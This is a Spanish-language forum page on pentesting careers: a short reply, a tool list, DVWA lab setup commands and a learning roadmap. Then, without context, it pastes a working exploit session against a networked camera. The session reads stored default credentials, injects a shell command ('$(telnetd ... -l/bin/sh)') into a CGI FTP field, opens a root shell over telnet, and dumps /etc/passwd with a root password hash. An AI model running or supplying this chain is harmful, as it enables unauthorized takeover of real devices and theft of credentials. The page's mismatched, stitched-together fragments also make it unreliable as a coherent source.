21
Off-Topic / Re: Panorama de trabajo actual
« Último mensaje por hielasangre en Mayo 24, 2025, 02:27:50 pm »Buenisimo el aporte bayas! Crees que eso con el tiempo pueda afectar la calidad de los pentest que se realizan?
- Burp Suite / OWASP ZAP
- Nmap, Nikto, Wfuzz, ffuf
- Gobuster, Sublist3r, Amass
- WhatWeb, Wappalyzer
- sqlmap, Metasploit
- Dirsearch, JSBeautifier
docker pull vulnerables/web-dvwa
docker run -d -p 8080:80 vulnerables/web-dvwa
1. Redes → 2. Linux → 3. Programación
↓
4. Fundamentos Hacking → 5. Herramientas
↓
6. OWASP Top 10 (a fondo) → 7. Plataformas de práctica
↓
8. Temas avanzados → 9. Automatización
↓
10. Reportes profesionales → 11. Certificaciones
daniel@fuckingmachine % wget -qO- 'http://admin:888888@192.168.1.250:50569/system.ini'|xxd
000006e0: 0004 0404 0404 0100 0005 0000 0000 0000 ................
000006f0: 0100 0000 0000 0000 0000 0000 0000 0000 ................
00000700: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000710: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000720: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000730: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000740: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000750: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000760: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000770: 0000 0000 6164 6d69 6e00 0000 0000 0000 ....admin.......
00000780: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000790: 0000 0000 3838 3838 3838 0000 0000 0000 ....888888......
000007a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000800: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000810: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000820: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000830: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000840: 0000 0000 0000 0000 0000 0000 0000 0000 ................
daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=888888&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=888888'
telnet 192.168.1.250 25
Trying 192.168.1.250...
Connected to pc192.168.1.250.
Escape character is '^]'.
BusyBox v1.12.1 (2013-07-23 17:19:11 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# cat /etc/passwd
root:OYZVRABjiXqqQ:0:0:Administrator:/:/bin/sh#